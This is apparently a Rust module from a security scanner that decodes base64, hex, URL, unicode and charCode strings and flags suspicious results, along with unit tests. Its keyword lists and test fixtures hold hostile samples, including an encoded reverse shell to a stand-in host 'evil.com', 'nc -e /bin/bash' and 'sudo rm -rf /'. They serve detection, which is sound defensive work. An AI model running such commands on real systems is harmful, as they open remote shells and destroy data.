use base64::Engine;
use rayon::prelude::*;
use regex::Regex;
use std::sync::LazyLock;
pub struct Deobfuscator;
static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
Regex::new(r"(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")
.expect("BASE64 regex")
});
static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}").expect("HEX regex")
});
static URL_ENCODED_PATTERN: LazyLock<Regex> =
LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){4,}").expect("URL encoded regex"));
static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> =
LazyLock::new(|| Regex::new(r"(?:\\u[0-9A-Fa-f]{4}){2,}").expect("Unicode escape regex"));
static CHAR_CODE_PATTERN: LazyLock<Regex> =
LazyLock::new(|| Regex::new(r"String\.fromCharCode\s*\([\d,\s]+\)").expect("CharCode regex"));
impl Deobfuscator {
pub fn new() -> Self {
Self
}
pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
if !self.has_encoded_patterns(content) {
return Vec::new();
}
vec![
self.decode_base64(content),
self.decode_hex(content),
self.decode_url(content),
self.decode_unicode_escapes(content),
self.decode_char_code(content),
]
.into_par_iter()
.flatten()
.collect()
}
fn has_encoded_patterns(&self, content: &str) -> bool {
BASE64_PATTERN.is_match(content)
|| HEX_PATTERN.is_match(content)
|| URL_ENCODED_PATTERN.is_match(content)
|| UNICODE_ESCAPE_PATTERN.is_match(content)
|| CHAR_CODE_PATTERN.is_match(content)
}
fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in BASE64_PATTERN.find_iter(content) {
let encoded = cap.as_str();
if encoded.len() < 20 {
continue;
}
if let Ok(decoded_bytes) = base64::engine::general_purpose::STANDARD.decode(encoded)
&& let Ok(decoded_str) = String::from_utf8(decoded_bytes)
&& self.is_suspicious(&decoded_str)
{
results.push(DecodedContent {
original: encoded.to_string(),
decoded: decoded_str,
encoding: "base64".to_string(),
});
}
}
results
}
fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in HEX_PATTERN.find_iter(content) {
let encoded = cap.as_str();
let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
encoded
.split("\\x")
.filter(|s| !s.is_empty())
.filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
.collect()
} else {
encoded
.split("0x")
.filter(|s| !s.is_empty())
.filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
.collect()
};
if let Ok(decoded_str) = String::from_utf8(hex_bytes)
&& self.is_suspicious(&decoded_str)
{
results.push(DecodedContent {
original: encoded.to_string(),
decoded: decoded_str,
encoding: "hex".to_string(),
});
}
}
results
}
fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in URL_ENCODED_PATTERN.find_iter(content) {
let encoded = cap.as_str();
let mut decoded_bytes = Vec::new();
let mut chars = encoded.chars().peekable();
while let Some(c) = chars.next() {
if c == '%' {
let hex: String = chars.by_ref().take(2).collect();
if let Ok(byte) = u8::from_str_radix(&hex, 16) {
decoded_bytes.push(byte);
}
} else {
decoded_bytes.push(c as u8);
}
}
if let Ok(decoded_str) = String::from_utf8(decoded_bytes)
&& self.is_suspicious(&decoded_str)
{
results.push(DecodedContent {
original: encoded.to_string(),
decoded: decoded_str,
encoding: "url".to_string(),
});
}
}
results
}
fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
let encoded = cap.as_str();
let mut decoded = String::new();
let mut chars = encoded.chars().peekable();
while let Some(c) = chars.next() {
if c == '\\' && chars.peek() == Some(&'u') {
chars.next(); let hex: String = chars.by_ref().take(4).collect();
if let Ok(code_point) = u32::from_str_radix(&hex, 16)
&& let Some(ch) = char::from_u32(code_point)
{
decoded.push(ch);
}
} else {
decoded.push(c);
}
}
if self.is_suspicious(&decoded) {
results.push(DecodedContent {
original: encoded.to_string(),
decoded,
encoding: "unicode".to_string(),
});
}
}
results
}
fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
let mut results = Vec::new();
for cap in CHAR_CODE_PATTERN.find_iter(content) {
let encoded = cap.as_str();
let numbers: Vec<u32> = encoded
.split(|c: char| !c.is_ascii_digit())
.filter(|s| !s.is_empty())
.filter_map(|s| s.parse().ok())
.collect();
let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
if self.is_suspicious(&decoded) {
results.push(DecodedContent {
original: encoded.to_string(),
decoded,
encoding: "charcode".to_string(),
});
}
}
results
}
fn is_suspicious(&self, content: &str) -> bool {
let suspicious_patterns = [
"eval",
"exec",
"bash",
"sh -c",
"/bin/",
"curl ",
"wget ",
"nc ",
"netcat",
"/dev/tcp",
"/dev/udp",
"base64 -d",
"python -c",
"ruby -e",
"perl -e",
"powershell",
"cmd.exe",
"rm -rf",
"chmod ",
"sudo ",
"password",
"secret",
"api_key",
"token",
"credential",
"http://",
"https://",
"ftp://",
];
let content_lower = content.to_lowercase();
suspicious_patterns
.iter()
.any(|p| content_lower.contains(p))
}
pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
use crate::engine::scanner::ScannerConfig;
let mut findings = Vec::new();
let config = ScannerConfig::new();
findings.extend(config.check_content(content, file_path));
for decoded in self.deobfuscate(content) {
let context = format!("{}:decoded:{}", file_path, decoded.encoding);
for mut finding in config.check_content(&decoded.decoded, &context) {
finding.message = format!(
"{} [Decoded from {} encoded content]",
finding.message, decoded.encoding
);
findings.push(finding);
}
if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
findings.push(crate::rules::Finding {
id: "OB-DEEP-001".to_string(),
severity: crate::rules::Severity::High,
category: crate::rules::Category::Obfuscation,
confidence: crate::rules::Confidence::Firm,
name: "Obfuscated suspicious content".to_string(),
location: crate::rules::Location {
file: file_path.to_string(),
line: 0,
column: None,
},
code: decoded.original.chars().take(100).collect::<String>() + "...",
message: format!(
"Found {} encoded content that decodes to suspicious payload",
decoded.encoding
),
recommendation: "Review the decoded content for malicious commands or URLs"
.to_string(),
fix_hint: None,
cwe_ids: vec!["CWE-116".to_string()],
rule_severity: None,
client: None,
context: None,
});
}
}
findings
}
fn is_highly_suspicious(&self, content: &str) -> bool {
let highly_suspicious = [
"bash -i",
"/dev/tcp/",
"nc -e",
"rm -rf /",
"curl | bash",
"wget | sh",
"eval(base64",
"exec(decode",
];
let content_lower = content.to_lowercase();
highly_suspicious.iter().any(|p| content_lower.contains(p))
}
}
impl Default for Deobfuscator {
fn default() -> Self {
Self::new()
}
}
#[derive(Debug, Clone)]
pub struct DecodedContent {
pub original: String,
pub decoded: String,
pub encoding: String,
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_decode_base64() {
let deob = Deobfuscator::new();
let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
let results = deob.decode_base64(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
#[test]
fn test_decode_hex() {
let deob = Deobfuscator::new();
let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
let results = deob.decode_hex(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
#[test]
fn test_decode_url() {
let deob = Deobfuscator::new();
let content = "%63%75%72%6c%20%68%74%74%70";
let results = deob.decode_url(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
#[test]
fn test_decode_charcode() {
let deob = Deobfuscator::new();
let content = "String.fromCharCode(101,118,97,108)";
let results = deob.decode_char_code(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("eval"));
}
#[test]
fn test_is_suspicious() {
let deob = Deobfuscator::new();
assert!(deob.is_suspicious("curl http://example.com"));
assert!(deob.is_suspicious("bash -c 'evil command'"));
assert!(deob.is_suspicious("password=secret123"));
assert!(!deob.is_suspicious("hello world"));
}
#[test]
fn test_deep_scan() {
let deob = Deobfuscator::new();
let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
let findings = deob.deep_scan(content, "test.sh");
assert!(
findings
.iter()
.any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
);
}
#[test]
fn test_deobfuscate_empty() {
let deob = Deobfuscator::new();
let results = deob.deobfuscate("normal text without obfuscation");
assert!(results.is_empty());
}
#[test]
fn test_default_trait() {
let deob = Deobfuscator;
assert!(!deob.is_suspicious("hello"));
}
#[test]
fn test_decode_unicode_escapes() {
let deob = Deobfuscator::new();
let content = r"\u0065\u0076\u0061\u006c";
let results = deob.decode_unicode_escapes(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("eval"));
}
#[test]
fn test_decode_base64_short_string() {
let deob = Deobfuscator::new();
let content = "YWJjZA=="; let results = deob.decode_base64(content);
assert!(results.is_empty());
}
#[test]
fn test_decode_base64_non_suspicious() {
let deob = Deobfuscator::new();
let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ="; let results = deob.decode_base64(content);
assert!(results.is_empty());
}
#[test]
fn test_decode_hex_0x_format() {
let deob = Deobfuscator::new();
let content = "0x630x750x720x6c0x200x680x740x740x70";
let results = deob.decode_hex(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
#[test]
fn test_is_highly_suspicious() {
let deob = Deobfuscator::new();
assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
assert!(deob.is_highly_suspicious("rm -rf /"));
assert!(deob.is_highly_suspicious("curl | bash something"));
assert!(deob.is_highly_suspicious("wget | sh something"));
assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
assert!(deob.is_highly_suspicious("eval(base64"));
assert!(deob.is_highly_suspicious("exec(decode"));
assert!(!deob.is_highly_suspicious("echo hello"));
}
#[test]
fn test_deobfuscate_with_base64() {
let deob = Deobfuscator::new();
let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20="; let results = deob.deobfuscate(content);
assert!(!results.is_empty());
}
#[test]
fn test_deobfuscate_multiple_encodings() {
let deob = Deobfuscator::new();
let content =
r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
let results = deob.deobfuscate(content);
assert!(!results.is_empty());
}
#[test]
fn test_deep_scan_clean_content() {
let deob = Deobfuscator::new();
let content = "normal clean content without any issues";
let findings = deob.deep_scan(content, "test.txt");
assert!(findings.is_empty());
}
#[test]
fn test_deep_scan_with_suspicious_decoded() {
let deob = Deobfuscator::new();
let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g="; let findings = deob.deep_scan(content, "test.sh");
let _ = findings;
}
#[test]
fn test_decoded_content_debug_trait() {
let content = DecodedContent {
original: "abc".to_string(),
decoded: "xyz".to_string(),
encoding: "base64".to_string(),
};
let debug_str = format!("{:?}", content);
assert!(debug_str.contains("DecodedContent"));
assert!(debug_str.contains("abc"));
}
#[test]
fn test_decoded_content_clone_trait() {
let content = DecodedContent {
original: "abc".to_string(),
decoded: "xyz".to_string(),
encoding: "base64".to_string(),
};
let cloned = content.clone();
assert_eq!(content.original, cloned.original);
assert_eq!(content.decoded, cloned.decoded);
assert_eq!(content.encoding, cloned.encoding);
}
#[test]
fn test_is_suspicious_various_patterns() {
let deob = Deobfuscator::new();
assert!(deob.is_suspicious("wget http://evil.com"));
assert!(deob.is_suspicious("nc -l 1234"));
assert!(deob.is_suspicious("netcat connection"));
assert!(deob.is_suspicious("/dev/tcp/evil"));
assert!(deob.is_suspicious("/dev/udp/evil"));
assert!(deob.is_suspicious("base64 -d | bash"));
assert!(deob.is_suspicious("python -c 'import os'"));
assert!(deob.is_suspicious("ruby -e 'exec'"));
assert!(deob.is_suspicious("perl -e 'system'"));
assert!(deob.is_suspicious("powershell.exe"));
assert!(deob.is_suspicious("cmd.exe /c"));
assert!(deob.is_suspicious("rm -rf /tmp"));
assert!(deob.is_suspicious("chmod 777 file"));
assert!(deob.is_suspicious("sudo rm"));
assert!(deob.is_suspicious("api_key=secret"));
assert!(deob.is_suspicious("token=abc123"));
assert!(deob.is_suspicious("credential_store"));
assert!(deob.is_suspicious("ftp://server"));
}
#[test]
fn test_decode_url_non_suspicious() {
let deob = Deobfuscator::new();
let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
let results = deob.decode_url(content);
assert!(results.is_empty());
}
#[test]
fn test_decode_hex_non_suspicious() {
let deob = Deobfuscator::new();
let content = r"\x68\x65\x6c\x6c\x6f";
let results = deob.decode_hex(content);
assert!(results.is_empty());
}
#[test]
fn test_decode_charcode_non_suspicious() {
let deob = Deobfuscator::new();
let content = "String.fromCharCode(104,101,108,108,111)";
let results = deob.decode_char_code(content);
assert!(results.is_empty());
}
#[test]
fn test_decode_unicode_non_suspicious() {
let deob = Deobfuscator::new();
let content = r"\u0061\u0062";
let results = deob.decode_unicode_escapes(content);
assert!(results.is_empty());
}
#[test]
fn test_deep_scan_original_content_finding() {
let deob = Deobfuscator::new();
let content = "sudo rm -rf /important/files";
let findings = deob.deep_scan(content, "script.sh");
assert!(!findings.is_empty());
}
#[test]
fn test_deobfuscate_with_url_encoding() {
let deob = Deobfuscator::new();
let content = "command=%63%75%72%6c%20http://evil.com";
let results = deob.deobfuscate(content);
assert!(results.iter().any(|r| r.encoding == "url"));
}
#[test]
fn test_deobfuscate_with_unicode_escapes() {
let deob = Deobfuscator::new();
let content = r"var cmd = '\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070'";
let results = deob.deobfuscate(content);
assert!(results.iter().any(|r| r.encoding == "unicode"));
}
#[test]
fn test_deobfuscate_with_charcode() {
let deob = Deobfuscator::new();
let content = "var x = String.fromCharCode(99,117,114,108,32,104,116,116,112)";
let results = deob.deobfuscate(content);
assert!(results.iter().any(|r| r.encoding == "charcode"));
}
#[test]
fn test_url_decode_with_only_percent_encoded() {
let deob = Deobfuscator::new();
let content = "%63%75%72%6c%20%68%74%74%70%3a%2f%2f";
let results = deob.decode_url(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
assert!(results[0].decoded.contains("http"));
}
#[test]
fn test_unicode_decode_multiple_escapes() {
let deob = Deobfuscator::new();
let content = r"\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070";
let results = deob.decode_unicode_escapes(content);
assert!(!results.is_empty());
assert!(results[0].decoded.contains("curl"));
}
#[test]
fn test_deobfuscate_all_encodings_combined() {
let deob = Deobfuscator::new();
let content = r#"
url=%63%75%72%6c%20http
unicode=\u0065\u0076\u0061\u006c
charcode=String.fromCharCode(99,117,114,108)
hex=\x63\x75\x72\x6c\x20\x68\x74\x74\x70
base64=Y3VybCBodHRwOi8vZXZpbC5jb20=
"#;
let results = deob.deobfuscate(content);
assert!(!results.is_empty());
}
#[test]
fn test_deep_scan_with_deobfuscated_rule_match() {
let deob = Deobfuscator::new();
let base64_content = "c3VkbyBybSAtcmYgLw==";
let content = format!("execute={}", base64_content);
let findings = deob.deep_scan(&content, "test.sh");
let has_decoded_finding = findings
.iter()
.any(|f| f.message.contains("Decoded") || f.id.contains("OB-DEEP"));
assert!(has_decoded_finding || !findings.is_empty());
}
#[test]
fn test_url_decode_mixed_with_normal_chars() {
let deob = Deobfuscator::new();
let content = "cmd=%63%75%72%6c%20http://evil.com|bash";
let results = deob.deobfuscate(content);
let _ = results; }
#[test]
fn test_unicode_escape_mixed_chars() {
let deob = Deobfuscator::new();
let content = r"var x = '\u0063url \u0068ttp://evil.com'";
let results = deob.deobfuscate(content);
assert!(results.is_empty() || results.iter().any(|r| r.encoding == "unicode"));
}
#[test]
fn test_decode_hex_invalid_format() {
let deob = Deobfuscator::new();
let content = "\\x6Gurl \\x7Gttp"; let results = deob.deobfuscate(content);
assert!(results.is_empty() || results.iter().all(|r| r.encoding != "hex"));
}
#[test]
fn test_charcode_partial_match() {
let deob = Deobfuscator::new();
let content = "eval(String.fromCharCode(98,97,115,104))";
let results = deob.deobfuscate(content);
assert!(results.iter().any(|r| r.encoding == "charcode"));
}
#[test]
fn test_deobfuscator_default() {
let deob: Deobfuscator = Default::default();
assert!(!deob.is_suspicious("normal text"));
assert!(deob.is_suspicious("curl http://evil.com"));
}
#[test]
fn test_url_decode_mixed_with_plain_chars() {
let deob = Deobfuscator::new();
let content = "%63%75%72%6c%20%68%74%74%70"; let results = deob.decode_url(content);
assert!(!results.is_empty());
assert_eq!(results[0].encoding, "url");
}
#[test]
fn test_decode_url_hello_world_not_suspicious() {
let deob = Deobfuscator::new();
let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64"; let results = deob.decode_url(content);
assert!(results.is_empty());
}
}